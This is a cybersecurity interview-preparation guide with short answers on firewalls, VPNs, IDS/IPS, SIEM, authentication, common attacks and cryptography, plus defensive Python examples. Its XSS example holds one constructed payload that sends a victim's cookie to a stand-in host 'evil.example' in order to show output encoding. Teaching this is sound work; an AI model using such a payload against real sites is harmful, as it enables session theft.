Expected questions for cybersecurity interviews (الأسئلة المتوقعة لمقابلات الأمن السيبراني)

This document collects short answers to common cybersecurity interview questions: the CIA triad, threats, vulnerabilities and risk, firewalls, VPNs and IPsec, IDS/IPS, SIEM, NAC, patch management, authentication (multi-factor, CHAP, Kerberos), risk assessment, incident response and disaster recovery, common attacks (malware, DoS/DDoS, MITM, XSS, phishing) and basic cryptography.

Cyber security concepts

What is Cybersecurity (Define)?


Cybersecurity is the protection of internet-connected systems, including hardware, software
and data, from cyberattacks, that is, from unauthorized access, alteration or disruption.

What is the goal of cybersecurity?

The goal of cybersecurity is to limit risk and protect IT assets from attackers with malicious
intent, that is, to maintain the confidentiality, integrity and availability (CIA) of systems
and data.

What is the difference between Threat, Vulnerability, and Risk?


o Threat: Anything with the potential to cause harm to a system or organization, whether a
person (an attacker), a program (malware) or an event (a power failure), for example by
stealing, altering or destroying data.
o Vulnerability: A weakness in a system (a bug, a misconfiguration, a missing control) that a
threat can exploit, making harm more likely or more severe.
o Risk: The combination of the probability that a threat exploits a vulnerability and the
impact (loss) if it does. In simple terms, the potential damage when a threat meets a
vulnerability; reducing either the likelihood or the impact reduces the risk.

What is the firewall?


A firewall is a network security system that monitors and controls incoming and outgoing
network traffic based on predetermined security rules. A firewall typically establishes a
barrier between a trusted internal network and an untrusted external network, such as the
Internet. Rules are evaluated in order, and traffic that matches no rule should be denied by
default.

Firewall Types
▪ Packet Filtering: Checks each packet on its own against rules on source/destination IP
address, protocol and port. It has no memory of earlier packets, so to admit replies it
must open broad inbound rules.
▪ Stateful Inspection: Maintains a table of established connections and admits inbound
packets only if they belong to a connection the inside initiated. Practically every
firewall sold today is at least stateful.
▪ Next-Generation (NGFWs): Adds application awareness, user identity and often an
integrated intrusion prevention engine, so decisions can use context about users, apps and
processes rather than just addresses and ports.
▪ Web Application Firewalls (WAFs): Filter, monitor and block HTTP(S) traffic to and from a
web application, inspecting the content of requests and responses. A WAF protects against
web application attacks such as SQL injection and cross-site scripting (XSS), but it is a
compensating control, not a substitute for fixing the application.
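
The difference between the first two firewall types above is easiest to see in code. The following is an added example, not part of the original document: a toy stateless packet filter and a toy stateful firewall, both enforcing the same policy (the trusted LAN, written here as addresses starting with "10.", may open connections to port 443 outside; nothing else). Packets, addresses and the connection table are constructed in memory; nothing is sent on a network.

```python
"""
Added example (not from the original page): a stateless packet filter next to
a stateful inspection firewall, both enforcing "LAN may connect out to 443".
All packets and addresses are constructed test data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    syn: bool = False   # TCP SYN flag set (new connection attempt)
    ack: bool = False   # TCP ACK flag set


def is_lan(addr: str) -> bool:
    """Hypothetical trusted network: anything in 10.0.0.0/8."""
    return addr.startswith("10.")


def stateless_allows(pkt: Packet) -> bool:
    """Packet filter: each packet is judged alone, by addresses and ports."""
    outbound = is_lan(pkt.src) and pkt.dport == 443
    # To let replies back in, a stateless filter has to open a hole:
    # "anything from port 443 to the LAN". It cannot tell a reply from a probe.
    inbound_reply_hole = is_lan(pkt.dst) and pkt.sport == 443
    return outbound or inbound_reply_hole


class StatefulFirewall:
    """Stateful inspection: remembers connections the LAN initiated and only
    admits inbound packets that belong to one of them."""

    def __init__(self) -> None:
        self.table = set()   # (lan_host, lan_port, remote_host, remote_port)

    def allows(self, pkt: Packet) -> bool:
        if is_lan(pkt.src):
            if pkt.dport == 443 and pkt.syn and not pkt.ack:
                # New outbound connection: record it and let it through.
                self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
                return True
            # Later outbound packets of an already tracked flow are fine too.
            return (pkt.src, pkt.sport, pkt.dst, pkt.dport) in self.table
        # Inbound: allowed only if it is the reverse of a tracked flow.
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.table


def demo() -> dict:
    fw = StatefulFirewall()
    client_syn = Packet("10.0.0.5", "203.0.113.10", 51000, 443, syn=True)
    server_synack = Packet("203.0.113.10", "10.0.0.5", 443, 51000, syn=True, ack=True)
    # An outsider sourcing traffic from port 443 to reach SSH on an internal
    # host that never asked for it: the stateless hole lets this through.
    probe = Packet("198.51.100.7", "10.0.0.5", 443, 22)
    return {
        "stateless": [stateless_allows(p) for p in (client_syn, server_synack, probe)],
        "stateful": [fw.allows(p) for p in (client_syn, server_synack, probe)],
    }


if __name__ == "__main__":
    print(demo())
```

The stateless filter admits all three packets, including the probe, because it cannot distinguish a reply from a new inbound connection that happens to come from port 443. The stateful firewall admits the SYN and the SYN/ACK that answers it, and drops the probe because no tracked flow matches it.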
What is a VPN?
A virtual private network (VPN) extends a private network across a public network such as
the Internet. It uses encryption and authentication so that only authorized users can join
the network and the data in transit cannot be read or altered by anyone in between. In the
common remote-access form it provides a secure, encrypted tunnel between the remote user and
the company network; a site-to-site VPN does the same between two gateways.

IPsec:
Internet Protocol Security (IPsec) is a secure network protocol suite that authenticates and
encrypts IP packets to provide secure communication between two hosts or gateways over an IP
network. It is widely used to build VPNs. IPsec has two security protocols:

▪ Authentication Header (AH): Authenticates the sender and detects any change to the
packet (including the IP header) in transit, but provides no encryption. Because it
covers the header, AH does not survive NAT, which is one reason it is rarely deployed.
▪ Encapsulating Security Payload (ESP): Encrypts the payload and can also authenticate
the sender and protect integrity. ESP is what almost all IPsec VPNs use.

Both can run in transport mode (protecting the payload between two end hosts) or tunnel mode
(encapsulating the whole original packet, as gateway-to-gateway VPNs do). Keys and
parameters are negotiated with IKE (Internet Key Exchange).

What is the difference between IDS and IPS?

IDS (intrusion detection system): a monitoring system, usually fed from a network tap or
SPAN port, that detects suspicious traffic and raises alerts but cannot block it.
IPS (intrusion prevention system): a control system placed inline in the traffic path that
detects and actively blocks intrusions. Because it is inline, a false positive blocks
legitimate traffic, so tuning matters. Both signature-based IDS and IPS need a regularly
updated signature database with the latest threat data.

Security Information and Event Management (SIEM)

SIEM products collect logs and security alerts from network appliances, servers and
applications into one place (aggregation), normalize them into a common format, correlate
events from different sources against rules, and raise alerts for analysts in near real
time. They also retain the events for investigation and compliance reporting.
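What "aggregation" and "correlation" mean in practice is shown by the following added example, which is not part of the original document. It parses constructed log lines from two different sources (an sshd-style syslog excerpt and a made-up web-portal log) into one common event record, then runs a single correlation rule over them: five or more failed logins from one source IP inside a 60-second window followed by a successful login from that IP, the classic brute-force signature. The log formats and addresses are invented for the example.

```python
"""
Added example (not part of the original page): a tiny SIEM-style pipeline.
Normalise two constructed log formats into one event shape, then correlate.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: an sshd syslog excerpt and a web-portal log.
SSH_LOG = """\
2024-05-01T10:00:01 sshd[811]: Failed password for root from 198.51.100.7 port 40001 ssh2
2024-05-01T10:00:09 sshd[812]: Failed password for root from 198.51.100.7 port 40002 ssh2
2024-05-01T10:00:15 sshd[813]: Failed password for admin from 198.51.100.7 port 40003 ssh2
2024-05-01T10:00:20 sshd[814]: Failed password for admin from 203.0.113.9 port 50000 ssh2
2024-05-01T10:00:31 sshd[815]: Failed password for root from 198.51.100.7 port 40004 ssh2
2024-05-01T10:00:40 sshd[816]: Failed password for root from 198.51.100.7 port 40005 ssh2
2024-05-01T10:00:47 sshd[817]: Accepted password for root from 198.51.100.7 port 40006 ssh2
"""
WEB_LOG = """\
2024-05-01T10:00:05 portal login_failed user=alice ip=203.0.113.9
2024-05-01T10:05:00 portal login_ok user=bob ip=192.0.2.44
"""

SSH_RE = re.compile(r"^(\S+) sshd\[\d+\]: (Failed|Accepted) password for (\S+) from (\S+)")
WEB_RE = re.compile(r"^(\S+) portal (login_failed|login_ok) user=(\S+) ip=(\S+)")


def normalise(line: str):
    """Map a raw line from either source to (time, outcome, user, src_ip),
    or None if the line is in a format we do not understand."""
    m = SSH_RE.match(line)
    if m:
        ts, result, user, ip = m.groups()
        return datetime.fromisoformat(ts), ("fail" if result == "Failed" else "success"), user, ip
    m = WEB_RE.match(line)
    if m:
        ts, result, user, ip = m.groups()
        return datetime.fromisoformat(ts), ("fail" if result == "login_failed" else "success"), user, ip
    return None   # a real SIEM would count this as a parse error, not drop it silently


def brute_force_alerts(lines, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Correlation rule: a source IP with >= threshold failures inside `window`
    that then logs in successfully. Returns (ip, user, time) tuples."""
    events = sorted(filter(None, (normalise(line) for line in lines)))  # time order across sources
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    alerts = []
    for ts, outcome, user, ip in events:
        if outcome == "fail":
            failures[ip].append(ts)
            failures[ip] = [t for t in failures[ip] if ts - t <= window]   # slide the window
        elif outcome == "success" and len(failures[ip]) >= threshold:
            alerts.append((ip, user, ts.isoformat()))
            failures[ip].clear()   # do not re-alert for the same burst
    return alerts


def demo():
    lines = SSH_LOG.splitlines() + WEB_LOG.splitlines()
    return brute_force_alerts(lines)


if __name__ == "__main__":
    for alert in demo():
        print("ALERT brute force followed by success:", alert)
```

Only 198.51.100.7 trips the rule: five failures between 10:00:01 and 10:00:40 and a success at 10:00:47. The two failures from 203.0.113.9 are below the threshold, and bob's successful login has no failures before it. Real SIEM rules look the same, only with the parsers generated from vendor schemas and the thresholds tuned to the environment.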

What is Network Access Control (NAC)?

NAC is a computer networking solution that uses a set of protocols (commonly IEEE 802.1X with
RADIUS) to define and enforce a policy describing how devices are granted access to network
nodes when they first attempt to connect.

NAC is an approach to computer security that unifies endpoint security technology (such as
antivirus, host intrusion prevention and vulnerability assessment), user or system
authentication, and network security enforcement: a device that fails the posture check can
be denied, or placed in a quarantine VLAN until it is remediated.

What is patch management?

The goal of patch management is to keep the various systems in a network up to date and
protect them against malware and hacking attacks that exploit known vulnerabilities.
Steps:
1. Read the description of the patch in question (what it fixes, what it changes, and
whether a reboot is required)
2. Deploy the patch on a test system that is identical to the systems to which you
intend to roll it out, and verify the affected service still works
3. Roll it out to a small number of live systems first, then to the rest in stages, with a
rollback plan in case the patch causes problems

What is sandboxing?
A behaviour-based software management strategy that runs an application in an isolated
environment, cut off from critical system resources and other programs. It provides an
extra layer of security that prevents malware or a harmful application from affecting the
rest of the system; the same technique is used to detonate suspicious files safely for
analysis.

Define baseline.
Network baselining is the act of measuring and recording the normal behaviour and
performance of a network under real conditions, so that deviations can later be recognised.
Establishing a network baseline requires testing and reporting of the physical connectivity,
normal network utilization, protocol usage, peak network utilization and average throughput.
In security, a baseline is the reference "normal" against which anomalies (an unusual
protocol, a host suddenly sending far more traffic) are detected.

What is the difference between the red team and the blue team?

The red team plays the attacker: it probes and exploits weaknesses in an organization's
security to show how a real adversary could get in.
The blue team plays the defender: it identifies and patches vulnerabilities, monitors for
intrusions and responds to them before they become successful breaches.

What is authentication and how is it implemented?

Authentication verifies that a user (or system) really is who it claims to be, using one or
more factors. Combining factors from different categories is multi-factor authentication
(MFA).
▪ Something you know: such as a password or PIN.
▪ Something you have: such as a smart card, hardware token or authenticator app.
▪ Something you are: such as your fingerprint or face.
▪ Something you do: such as an action or behaviour pattern (typing rhythm, signature).
▪ Somewhere you are: based on geolocation or network address.

What is the Challenge Handshake Authentication Protocol (CHAP)?

CHAP is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate
the identity of remote clients. It uses a three-way handshake: the server sends a random
challenge, the client replies with a one-way hash (MD5) of its identifier, the shared secret
and the challenge, and the server recomputes the hash and answers Success or Failure. The
secret itself never crosses the link, and because each challenge is new, a captured response
cannot be replayed. CHAP periodically repeats the challenge during the session to re-verify
the client.
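
The three messages of the handshake, with both sides' computations, are shown in the following added example; it is not part of the original document. It follows RFC 1994 (CHAP with MD5: response = MD5(identifier || secret || challenge)) in a single process, and also shows why replaying a recorded response fails. The peer name and secrets are invented for the example.

```python
"""
Added example (not from the original page): CHAP (RFC 1994, MD5 algorithm)
simulated in one process: Challenge -> Response -> Success/Failure.
"""
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP with MD5 (algorithm 5): MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """The PPP server side: holds each peer's secret and issues challenges."""

    def __init__(self, secrets: dict) -> None:
        self.secrets = secrets        # name -> shared secret (bytes)
        self.identifier = 0
        self.outstanding = {}         # identifier -> challenge value still awaiting a response

    def challenge(self):
        """Packet 1 (Challenge): a new identifier and a fresh random value every time."""
        self.identifier = (self.identifier + 1) & 0xFF
        value = os.urandom(16)
        self.outstanding[self.identifier] = value
        return self.identifier, value

    def check(self, identifier: int, name: str, response: bytes) -> str:
        """Packet 3 (Success/Failure): recompute the digest and compare in constant time."""
        value = self.outstanding.pop(identifier, None)   # each challenge is usable once
        secret = self.secrets.get(name)
        if value is None or secret is None:
            return "Failure"
        expected = chap_response(identifier, secret, value)
        return "Success" if hmac.compare_digest(expected, response) else "Failure"


class Peer:
    """The dial-in client: knows its own secret and never sends it."""

    def __init__(self, name: str, secret: bytes) -> None:
        self.name, self.secret = name, secret

    def respond(self, identifier: int, challenge: bytes):
        """Packet 2 (Response)."""
        return self.name, chap_response(identifier, self.secret, challenge)


def run_handshake(peer: Peer, auth: Authenticator) -> str:
    ident, value = auth.challenge()
    name, resp = peer.respond(ident, value)
    return auth.check(ident, name, resp)


def replay_attempt(peer: Peer, auth: Authenticator) -> str:
    """An eavesdropper records a genuine (identifier, response) pair and submits
    it against the next challenge. The new challenge value makes it fail."""
    ident, value = auth.challenge()
    name, resp = peer.respond(ident, value)
    auth.check(ident, name, resp)          # genuine exchange completes
    ident2, _ = auth.challenge()           # new identifier and new random value
    return auth.check(ident2, name, resp)  # replayed old response


if __name__ == "__main__":
    auth = Authenticator({"alice": b"correct horse battery staple"})   # made-up secret
    good = Peer("alice", b"correct horse battery staple")
    bad = Peer("alice", b"wrong secret")
    print(run_handshake(good, auth), run_handshake(bad, auth), replay_attempt(good, auth))
```

Two practical caveats follow from the code: the authenticator must hold the plaintext secret (it cannot store a hash, since it needs the secret to recompute the response), and MD5 is used because the RFC mandates it, not because it is a good choice today; anyone who captures challenge/response pairs can run an offline dictionary attack on a weak secret.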

What is Kerberos?
Kerberos is a computer-network authentication protocol that works on the basis of tickets
to allow nodes communicating over a non-secure network to prove their identity to one
another in a secure manner.

Kerberos authentication uses a key distribution centre (KDC) to orchestrate the process: the
client first obtains a ticket-granting ticket (TGT) from the KDC's authentication service,
then presents it to the ticket-granting service to get a service ticket for each server it
wants to reach. Kerberos depends on synchronised clocks, which is why clock skew is a classic
cause of authentication failures.

Risk Management?
The process of identifying risks, analyzing them, developing a response strategy for them,
and mitigating their future impact.

What is a cybersecurity risk assessment?

A cybersecurity risk assessment identifies the information assets that are exposed to
cyber-attacks (customer data, servers, laptops, and so on) and evaluates the various risks
that could affect those assets.

A risk assessment is performed by identifying:

Relevant threats to your organization
Internal and external vulnerabilities
The likelihood of each vulnerability being exploited and the impact if it is

Incident Response Procedures


Preparation
Identification
Containment
Eradication
Recovery
Lessons learned

What is disaster recovery?

Disaster recovery is the act of restoring data and systems following a disaster in which
they have been destroyed or made unavailable.
A disaster-recovery plan helps an organization respond effectively when a disaster occurs: it
defines what is restored, in what order, from which backups, how quickly (the recovery time
objective) and with how much data loss (the recovery point objective).

Types of malware?
Ransomware, viruses, worms, Trojans, bots, keyloggers, spyware, rootkits and adware. (Spam
is often listed alongside them, but it is unsolicited mail, a delivery vector for malware
rather than malware itself.)

DoS and DDoS attacks?

Denial of service (DoS): making a machine or network resource unavailable to its intended
users by temporarily or indefinitely disrupting its services, for example by exhausting
bandwidth, connection tables or CPU.
Distributed denial of service (DDoS): the flood of incoming traffic originates from many
different sources (typically a botnet), which makes it far harder to block by source address.

What is a man-in-the-middle attack (MITM)?

MITM is an attack where the attacker secretly relays and possibly alters the communication
between two parties who believe they are directly communicating with each other.
Examples: a rogue DHCP server that hands out the attacker as the default gateway, ARP
poisoning on the local network. Mutual authentication and encryption (TLS with certificate
validation) are the usual defence.

Define a zero-day attack.

A zero-day attack exploits a security vulnerability in software for which no patch has yet
been released, typically because the vendor was unaware of it (it has had "zero days" to
fix it). Until a patch exists, defence relies on mitigations such as disabling the affected
feature, network filtering and monitoring for signs of exploitation.

What is the use of traceroute?

Traceroute is a network diagnostic tool used to trace the path packets take through an IP
network from source to destination. It sends probes with an increasing time-to-live (TTL)
so that each router along the way returns an ICMP "time exceeded" message, and it records
the address and round-trip time of every hop on the route.

What is a botnet?

A botnet is a group of internet-connected devices such as servers, PCs, mobile devices and
IoT devices that have been infected with malware and are controlled remotely by an attacker
(the bot herder) through a command-and-control channel. Botnets are used for DDoS attacks,
spam and credential stuffing.

What is cross-site scripting and how can it be prevented?

Cross-site scripting (XSS) is a client-side injection attack that executes attacker-supplied
script in a victim's web browser by injecting it into a page the site serves. It is prevented
by encoding untrusted data for the context where it is output (HTML body, attribute,
JavaScript, URL), validating input, and adding a Content Security Policy as defence in depth.

What is the difference between stored and reflected XSS?

o Stored XSS: the injected script is saved on the target server (in a comment, profile
field or message) and served to every victim who later requests that stored content.
o Reflected XSS: the script is carried in the request itself, usually a URL parameter,
and the server echoes it back in the response. The attacker has to get the victim to
send that crafted request, typically by sending them a link.
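
The following added example, not part of the original document, shows a reflected XSS in a hand-built search page and the hardened version of the same page. No web framework is used: each function returns the HTML a server would send for the query parameter, and the payloads are constructed test input. The same output-encoding rule fixes stored XSS too, since the bug is where the data is written into the page, not where it came from.

```python
"""
Added example (not from the original page): reflected XSS, vulnerable and fixed.
"""
import html
from urllib.parse import quote


def render_vulnerable(query: str) -> str:
    """User input is pasted straight into the page. A crafted link such as
    /search?q=<script>...</script> is reflected and runs in the victim's browser."""
    return f"<h1>Results for {query}</h1><a href='/search?q={query}'>again</a>"


def render_fixed(query: str) -> str:
    """Context-aware output encoding: HTML-escape text that lands in element
    content, and URL-encode the same text where it lands inside a URL."""
    safe_text = html.escape(query, quote=True)   # escapes < > & " '
    safe_url = quote(query, safe="")             # percent-encodes everything but unreserved chars
    return f'<h1>Results for {safe_text}</h1><a href="/search?q={safe_url}">again</a>'


def csp_header() -> tuple:
    """Defence in depth: a Content-Security-Policy that forbids inline script
    stops a reflected payload from executing even if an encoding bug slips through."""
    return ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


# Constructed payloads: one injects a script tag, one breaks out of an attribute.
PAYLOAD_SCRIPT = "<script>document.location='//evil.example/?c='+document.cookie</script>"
PAYLOAD_ATTR = '" onmouseover="alert(1)'

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_SCRIPT))
    print(render_fixed(PAYLOAD_SCRIPT))
    print(csp_header())
```

In the fixed version the script tag survives only as text (`&lt;script&gt;` in the heading, `%3Cscript%3E` in the link), so the browser renders it instead of executing it. Template engines that auto-escape do the `html.escape` part for you, but not the URL-context part, which is why the context still has to be chosen by the developer.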

What is active reconnaissance?

Active reconnaissance is the phase of an attack where the intruder interacts directly with
the target system to collect data about its vulnerabilities (as opposed to passive
reconnaissance, which only uses public sources and never touches the target).

Attackers mostly use port scanning to identify open ports, fingerprint the services behind
them and then exploit vulnerabilities in those services. Because it touches the target,
active reconnaissance can show up in IDS alerts and firewall logs.

What is the difference between vulnerability assessment and penetration testing?

Vulnerability Assessment: a process to define, detect and prioritize the vulnerabilities in
computer systems, network infrastructure, applications, etc., giving the organization the
information required to fix the flaws. It is usually automated and broad, and does not
attempt to exploit what it finds.
Penetration Testing: also called pen testing or ethical hacking. It is a process of testing
a network, system, application, etc. by actually attempting to exploit vulnerabilities the
way a real attacker would, in order to demonstrate what an attacker could achieve.

What is phishing and how can it be prevented?

Phishing is a malicious attempt to pass oneself off as a trusted entity in electronic
communication, through fraudulent messages and emails, in order to obtain sensitive
information such as usernames and passwords. It is countered by user awareness training,
email filtering and sender authentication (SPF, DKIM, DMARC), and by multi-factor
authentication so that a stolen password alone is not enough.

What is security misconfiguration?

Security misconfiguration is a vulnerability that arises when an application, network or
device is left in an insecure state because of how it was set up rather than because of a
software bug. It can be as simple as keeping the default username and password unchanged,
leaving debugging or directory listing enabled, or exposing an admin interface to the
Internet.

Cryptography
Cryptography is a method of protecting information and communications through the use of
codes so that only those for whom the information is intended can read and process it.

What is the CIA triad?

The CIA triad is a well-known, venerable model for the development of security policies,
used to identify problem areas and the necessary controls in information security.

Confidentiality: ensuring that only authorized parties can read data.
Integrity: ensuring that any unauthorized change to data will be detected and rejected.
Availability: ensuring that systems and data are accessible to authorized users when needed.

Authentication (the sender and receiver can confirm each other's identity and the origin of
the information) and non-repudiation are related goals that cryptography also provides, but
they are not part of the triad.

Encryption can provide confidentiality at different network layers:

• Application layer (email, e.g. PGP or S/MIME)
• Transport/session layer (SSL/TLS)
• Network layer (IPsec)
• Data link layer (MACsec)

Types of cryptography:
Symmetric-key (single-key) encryption algorithms: use the same key to encrypt and decrypt
data, so the key must be shared securely in advance. Fast, and used for bulk data.
EX: AES (the current standard); 3DES and DES are legacy, and DES is broken and should not
be used.
Asymmetric-key encryption algorithms: use a key pair. Data encrypted with the public key can
only be decrypted with the matching private key, and the private key can sign data that
anyone can verify with the public key. Slower, so typically used to exchange symmetric keys
and to sign.
EX: RSA, ElGamal, and elliptic-curve schemes such as ECDSA

Secure Sockets Layer (SSL) / Transport Layer Security (TLS)

SSL is a protocol that provides encrypted, authenticated sessions between two parties across
the Internet. It sits between the application and the transport layer, so HTTPS is HTTP
running over it; the browser authenticates the server through its X.509 certificate. Every
version of SSL itself is now deprecated; what is deployed today is its successor TLS (1.2
and 1.3), although people still say "SSL certificate".

Hashing: a mechanism used for data integrity assurance, based on a one-way function that maps
input of any length to a fixed-length digest. EX: MD5, SHA-1, SHA-2 (e.g. SHA-256). MD5 and
SHA-1 are broken for collision resistance and should only be seen in legacy systems; use
SHA-2 or SHA-3.

What is the difference between hashing and salting?

• Hashing is widely used for password storage and integrity checks; it is a one-way function
that maps data to a fixed-length value.
• Salting is an extra step in hashing a password: a random value is added to the password
before hashing and stored beside the hash. Two users with the same password then get
different hashes, and precomputed (rainbow) tables become useless. For passwords the hash
should also be slow (PBKDF2, bcrypt, scrypt or Argon2) to make brute force expensive.
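
The following added example, not part of the original document, shows the two points above in code: an unsalted hash gives identical digests for identical passwords, while a per-user random salt with an iterated key-derivation function (PBKDF2-HMAC-SHA256 from the standard library) does not, and verification recomputes the digest from the stored salt and compares it in constant time. The passwords and the iteration count are chosen for the example.

```python
"""
Added example (not from the original page): plain hashing versus salted,
iterated password hashing with hashlib.pbkdf2_hmac.
"""
import hashlib
import hmac
import os


def naive_hash(password: str) -> str:
    """Unsalted SHA-256: two users with the same password get the same digest,
    and one precomputed (rainbow) table applies to every account at once."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password: str, iterations: int = 600_000) -> dict:
    """Salted, iterated PBKDF2-HMAC-SHA256. The salt is stored beside the hash;
    it is not secret, it only has to be unique and random per record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def verify(password: str, record: dict) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


def demo(iterations: int = 600_000) -> dict:
    """Two users choose the same (constructed) password."""
    alice = make_record("Winter2024!", iterations)
    bob = make_record("Winter2024!", iterations)
    return {
        "naive_collide": naive_hash("Winter2024!") == naive_hash("Winter2024!"),
        "salted_differ": alice["hash"] != bob["hash"],
        "alice_ok": verify("Winter2024!", alice),
        "alice_wrong": verify("winter2024!", alice),
    }


if __name__ == "__main__":
    print(demo())
```

The iteration count is what makes a leaked database expensive to attack: each guess costs the attacker the same 600,000 HMAC computations it costs the server. Storing the count in the record lets it be raised later without invalidating existing users.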

Public key infrastructure (PKI)

A public key infrastructure (PKI) is the set of roles, policies, hardware, software and
procedures needed to create, manage, distribute, use, store and revoke digital certificates
and manage public-key encryption. A certificate authority (CA) signs certificates that bind
a public key to an identity, and revocation is published through CRLs or OCSP.

Eng. Safwan Rastanawi


Safwan.rastanawi@gmail.com
+966596693321
@safwan.rastanawi
